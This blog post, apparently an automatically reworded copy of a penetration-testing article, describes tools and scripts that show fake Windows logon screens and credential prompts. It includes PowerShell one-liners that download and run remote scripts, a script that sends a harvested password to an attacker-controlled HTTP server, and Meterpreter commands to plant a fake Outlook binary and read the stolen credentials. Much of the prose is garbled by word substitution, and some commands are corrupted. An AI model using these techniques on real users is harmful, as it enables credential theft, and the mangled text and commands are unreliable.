Phishing Windows Credentials

It is exceptionally regular in Windows conditions when projects are executed to require from the client to enter his space qualifications for validation like Outlook, approval of rise of benefits (User Account Control) or just when Windows are dormant (Lock Screen). Imitate this conduct of Windows can prompt gather accreditations of Windows clients that could be utilized for sidelong development during red group evaluations. This procedure can be valuable when beginning traction has been accomplished on the framework and qualifications of the client can’t be found by elective techniques.


Present day red joining method expect tradecraft to be situated in C# language since it permits in-memory execution by different systems, for example, Cobalt Strike, Covenant and so forth. The FakeLogonScreen is a Windows utility that was created in C# by Arris Huijgen that will mirror Windows logon screen trying to get the secret key of the current client.


The instrument can show the foundation that is right now designed so as to decrease the danger of security cognizant clients to detect this malignant activity.

Windows Fake Logon Screen

At the point when the client enter his secret phrase on the phony logon screen it will play out an approval against the Active Directory or locally to guarantee that the secret key is right. The secret phrase will be shown in the reassure.

Counterfeit Logon Screen – Credentials

There is likewise an optional paired which is a piece of the venture and stores the accreditations to a document (user.db) on neighborhood plate. Explicitly executing the accompanying will peruse the record that contains the qualifications of the area client.

type C:Userspentestlab.PENTESTLABAppDataLocalMicrosoftuser.db

Counterfeit Logon Screen – Credentials Stored

A comparative get together paired called SharpLocker was created by Matt Pickford that upon execution will show a phony logon screen to the client.

SharpLocker – Lock Screen

Each and every keystroke will be caught on the comfort until the secret phrase of the client is completely revealed.

SharpLocker – Password


Windows security input prompts are normal since applications in professional workplaces may ask the clients in customary premise to validate. Microsoft viewpoint is one item that plays out this solicitation for certifications regularly in an area situation. A device that endeavors to imitate a Windows security brief is CredsLeaker which requires a web worker to store the fundamental records that will peruse the certifications and think of them in a book document and PowerShell to conjure the HTTP demand. The PowerShell orders can be executed straightforwardly from a BAT document.


CredsLeaker – HTTP Delivery

Before execution of the BAT document data on the undertaking records ought to be adjusted to focus on the web worker that stores the design, PHP and PowerShell documents. At the point when the BAT record is executed a Windows security popup will showed to the client.

Information Prompt – CredsLeaker

The apparatus performs approval against the certifications and the popup will possibly vanish whenever provided accreditations are right. The Domain, the host name, username and secret key will be composed into the accompanying area.


CredsLeaker – Credentials

Matt Nelson built up a PowerShell content which will produce an info brief with ability to check if the certifications are substantial as in any case the brief isn’t shutting. The content can be executed from a far off area and the accreditations will showed in the comfort.

powershell.exe – ep Bypass – c IEX ((New-Object Net.WebClient).DownloadString(‘’)); Invoke-LoginPrompt

Windows Input Prompt – PowerShell

Nishang structure additionally contains a PowerShell content that could be utilized to make a phony info brief so as to reap windows accreditations.

PowerShell – Invoke-CredentialsPhish

The information brief will contain a message to the client that certifications are required to play out this activity. Greater security mindful clients may distinguish that something has been executed on the foundation however this isn’t completely applied to all the corporate clients.

Summon CredentialsPhish – Input Prompt

At the point when qualifications of the clients are gone into the Windows box these will showed back to the reassure.

PowerShell – Invoke-CredentialsPhish

On the other hand the content could be executed from a distant area to dodge discovery.

powershell.exe – ep Bypass – c IEX ((New-Object Net.WebClient).DownloadString(‘’)); Invoke-CredentialsPhish

Shell – Invoke-CredentialsPhish

Ransack Fuller presented in his blog the assault of catching Windows certifications utilizing a Metasploit module and PowerShell. Metasploit Framework contains modules which can catch qualifications over different conventions (FTP, SMB HTTP etc.).The following module can be utilized so as to set up an essential HTTP worker that will require validation.

utilize assistant/worker/catch/http_basic


PowerShell can be utilized to convey the assault of phishing windows qualifications by making an info brief and utilize the accreditations to start a HTTP solicitation to the Metasploit worker so the certifications could be caught.

$cred = $host.ui.promptforcredential(‘Failed Authentication’,”,[Environment]::UserDomainName + “” + [Environment]::UserName,[Environment]::UserDomainName);[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};

$wc = new-object net.webclient;

$wc.Headers.Add(“User-Agent”,”Wget/1.9+cvs-stable (Red Hat modified)”);

$wc.Proxy = [System.Net.WebRequest]::DefaultWebProxy;

$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;

$wc.credentials = new-object$cred.username, $cred.getnetworkcredential().password, ”);

$result = $wc.downloadstring(‘’);

The subjective information brief needs to utilize UTF-16LE character encoding and changed over to Base64.

feline popup.txt | iconv – t UTF-16LE

feline popup.txt | iconv – t UTF-16LE | base64 – w0

PowerShell – Input Prompt

Executing the accompanying from a Windows order fast or a shell will show to the client the phony windows input brief.

powershell.exe – ep sidestep – enc <base64>

Login Screen – PowerShell

The Metasploit module will get the solicitation with the certifications.

Metasploit HTTP Server – Capture Authentication


Metasploit Framework contains a module which has the ability to bring forth an info brief when a particular procedure or any procedure is made. The module must be connected into a current Meterpreter meeting and the procedure should be characterized.

use post/windows/accumulate/phish_windows_credentials




Information Prompt – Metasploit Module

The special case * trains the module to screen all the procedure that are running on the framework and trusts that another examples will begin so as to show the phony info brief to the client.

Information Prompt Metasploit – All Processes

The information brief will be shown to the client as an accreditation demand from the procedure so as to begin.

Windows Input Prompt

At the point when the client enter his certifications these will be caught and shown back to the reassure.

Metasploit Module – Credentials

On the other hand the module can be designed to screen just for the making of a particular procedure.

Metasploit Module – Windows Credentials


Lockphish is another instrument with capacity to actualize a phishing assault against the Windows logon screen. The related layout will be facilitated into a PHP worker and as a matter of course utilizes YouTube so as to divert the client after his certifications have been submitted.


LockPhish – Installation

Social building is required so as to deceive the client to tap the immediate connection that is facilitating the phony logon screen.

LockPhish – WebPage

A phony logon screen will be shown on the screen of the client that will require the secret phrase of the Administrator account. Anyway contrast with different apparatuses that focus on the lock screen the arrangement of the secret key field isn’t exact and the way that requires the Administrator account rather than the current client record may change the client. Besides, it doesn’t play out any approval locally or in the dynamic catalog.

LockPhish – Lock Screen

When the client enter his accreditations a redirection will follow to YouTube site.

LockPhish Redirection

The qualifications will be shown back in the support.

LockPhish Credentials


Preceding the C# and PowerShell age this assault was executed from a discretionary executable. The paired bolstered two boundaries so as to permit the entrance analyzer to determine the objective space and the record name that will store the caught accreditations.

execute – f “cmd/c start OUTLOOK.exe pentestlab.local creds.txt”

Standpoint Binary

The paired was recognized as an Outlook application (Outlook 2010, Outlook 2013) so as to trick the blue group since it was contacting the circle. The info brief was shown to the client like PowerShell based information prompts.

Viewpoint – Input Prompt

Certifications were put away into a shrouded organizer inside %AppData% and the accompanying orders could be executed from a Meterpreter meeting to execute the assault and to peruse the caught qualifications.

disc %AppData%

transfer OUTLOOK.exe

execute – f “cmd/c start OUTLOOK.exe pentestlab.local creds.txt”

disc Local

disc Temp

feline creds.txt

Leave a Reply

Your email address will not be published. Required fields are marked *